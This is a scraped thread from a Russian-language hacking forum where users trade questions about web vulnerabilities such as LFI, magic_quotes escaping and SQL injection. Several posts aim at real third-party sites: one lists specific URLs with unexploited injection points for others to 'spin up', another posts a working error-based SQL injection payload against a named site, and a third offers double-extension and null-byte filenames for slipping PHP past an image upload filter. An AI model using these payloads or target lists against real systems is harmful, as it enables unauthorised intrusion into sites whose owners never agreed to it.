Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    2Strilo4ka дай посмотреть плз
     
    1 person likes this.
  2. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    :) двиг 102 атрибута, и второй параметр в лимите.
    не скажу.

    up

    вот:
    Showing rows 0 - 0 (1 total, Query took 0.0009 sec)
    #1221 - Incorrect usage of UNION and ORDER BY

    Понятно что скобки, то не поставить... Идеи?
     
    #12842 Strilo4ka, 11 May 2010
    Last edited: 11 May 2010
  3. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    странно, 1 и 3 ничего не выводит, или я что-то недопонял.
     
  4. DIEZalok

    DIEZalok Banned

    Joined:
    22 Jan 2009
    Messages:
    14
    Likes Received:
    11
    Reputations:
    12
    Часто встречал при LFI при инклюде /proc/self/status встречается 'php5-cgi', в таком случае, при доступе к /proc/self/environ не интерпритируется PHP-код (проверял много раз).

    Объясните, почему?
     
  5. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    2BrainDeaD, прочти сначала о blind sql injection https://forum.antichat.ru/thread35207-blind+sql+injection.html
    https://forum.antichat.ru/thread18552-blind+sql+injection.html
     
    #12845 Bb0y, 11 May 2010
    Last edited: 11 May 2010
  6. BrainDeaD

    BrainDeaD Elder - Старейшина

    Joined:
    9 Jun 2005
    Messages:
    774
    Likes Received:
    292
    Reputations:
    214
    спасибо. у меня ещё много недочётов в знаниях. будем исправляться.
     
  7. Анжелика

    Анжелика Elder - Старейшина

    Joined:
    25 Mar 2008
    Messages:
    25
    Likes Received:
    36
    Reputations:
    -4
    Фильтрация - удаление взвешенного вещества из массы воды путем прохождения через слой пористого материала или через сетки с подходящим размером отверстий.

    Грубо говоря, если мы имеем ввиду компьютерную тематику в общем, и хек тематику в частности, фильтрация - удаление символов. Меджик квотс ничего не удаляет, она экранирует
     
    1 person likes this.
  8. Анжелика

    Анжелика Elder - Старейшина

    Joined:
    25 Mar 2008
    Messages:
    25
    Likes Received:
    36
    Reputations:
    -4
    значит это не LFI, а fopen или file_get_contents
     
    1 person likes this.
  9. DIEZalok

    DIEZalok Banned

    Joined:
    22 Jan 2009
    Messages:
    14
    Likes Received:
    11
    Reputations:
    12
    Я умею отличать LFI от остального. Я же написал!
    Каждый раз, когда преписка cgi, php код не интерпритируется!
     
  10. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    up..pomoqite pojalsuta
     
  11. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    список не раскрученных инъекций =:)

    http://www.sun-e-shop.co.za/?Task=CompanyInfo&CategoryID=3777'
    http://www.scottishfuturestrust.org.uk/news.asp?id=1'
    http://www.ncm.org.uk/news.asp?id=1'

    может кто раскрутит =))...
     
  12. Анжелика

    Анжелика Elder - Старейшина

    Joined:
    25 Mar 2008
    Messages:
    25
    Likes Received:
    36
    Reputations:
    -4
    показать пример где интерпритируется? Эта приписка всего лишь определяет что php работает как CGI, а не как модуль апача
    Мозгом надо работать. Фильтрация - это отсеивание определенных символом, например если бы в защите использовалась функция preg(ereg)_replace и тп - это была бы фильтрация, а magic_quotes - это экранирование. Не путай термины - эту ветку читают новички, они потом и будут ходить и говорить что MQ-это фильтрация
    А в этом плане я действительно больше понимаю чем ты, уж извини
     
    2 people like this.
  13. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    откуда magic ON ?

    а здесь к чему филтрасия ?
    и вообше что здeлать тут ?
     
  14. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    v1d0qz, ты просто не понимаешь семантику слова "фильтрация".
    Когда говорят "фильтрация" в голове возникает образ чего-то, проходящего отбор или отсев. При фильтрации материи или сущности, этой сущности становится меньше, из нее забирают что-либо.

    Magic Quotes добавляет, а не отнимает.
     
  15. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Magic_quotes - экранирование (c) capitan!
    А фильтрация бывает разная, чёрная, белая, красная...
     
  16. AHMED HASSAN

    AHMED HASSAN New Member

    Joined:
    25 Apr 2007
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    first sorry for my English

    i don't speak Russian fluently

    i was asking about

    1- how to bypass php filter on uploading image is there is

    any way to bypass i know the ways of live http header and tamper data and so on

    what if site changes name from upload.php to 111.gif ????

    is there is any way to bypass
     
  17. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    _http://sng.by/articles/1.html
    можно тут че заимутить? = \
     
  18. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    http://sng.by/articles/439'+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+.html
     
    1 person likes this.
  19. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    1111.gif.php
    1111.gif%00.php - Know triggered or not
     
    1 person likes this.
  20. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Помогите кто довести до ума плз)
    а то я в таких скул не шарю = \ \ \ \
     
Thread Status:
Not open for further replies.